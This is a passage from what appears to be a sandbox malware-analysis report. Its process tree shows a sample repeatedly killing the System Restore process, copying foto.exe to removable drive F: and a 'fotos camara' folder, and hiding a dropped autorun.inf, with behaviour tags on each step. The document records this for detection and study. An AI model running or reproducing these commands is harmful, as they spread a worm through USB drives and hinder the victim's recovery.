    PID:5088
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:904
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4452
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2528
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:3624
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1312
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3220
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:3676
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4936
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4332
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1356
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:4328
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4836
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2076
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2060
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4428
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2320
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4608
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:4652
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4544
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3284
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:5112
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:1796
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4632
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2220
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:228
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2596
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3048
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2732
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2112
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4056
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3672
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:4628
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:800
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3280
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4560
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2236
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4248
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3852
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:3100
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3564
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2512
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2388
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4600
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:460
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2288
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3204
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:3764
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4344
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4040
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4676
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4292
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:5068
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3068
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4952
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3208
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4576
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:360
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4796
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3748
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:4756
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:880
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2472
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:4036
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:5056
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1212
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1240
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2128
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4696
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2908
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1312
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:1492
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3220
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4936
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4496
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:1396
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2016
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:4500
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4604
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2076
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:744
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:3180
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4428
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:944
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2248
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2184
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4668
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4312
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:508
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3232
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4632
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:5092
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4376
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3048
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4204
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4648
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2496
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3672
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2568
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:1708
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2080
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1780
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:2312
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3984
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1472
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4844
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:4356
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3564
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4548
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4856
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:4852
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3372
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3116
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2444
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1188
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3384
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4040
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2324
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4760
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1952
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4792
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2452
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:3448
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:696
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:5052
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4612
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3792
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:1616
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3604
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4772
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:4492
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:772
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2128
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:684
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3156
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:1312
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3676
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3428
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4532
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4936
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3212
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:4328
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:4948
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2016
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:4500
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4904
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2264
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3768
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2320
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3856
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2820
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2096
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:4652
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2184
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:4880
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:5112
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:436
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4632
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:4172
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3760
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2732
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4804
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:712
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4976
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4468
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4780
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:760
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:3236
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2236
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4684
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2548
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4920
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3100
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4356
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4916
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:3300
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4856
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:460
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1768
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3316
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2584
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1704
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3928
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:5020
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3628
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4908
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:696
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:4664
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4932
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4832
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\attrib.exe
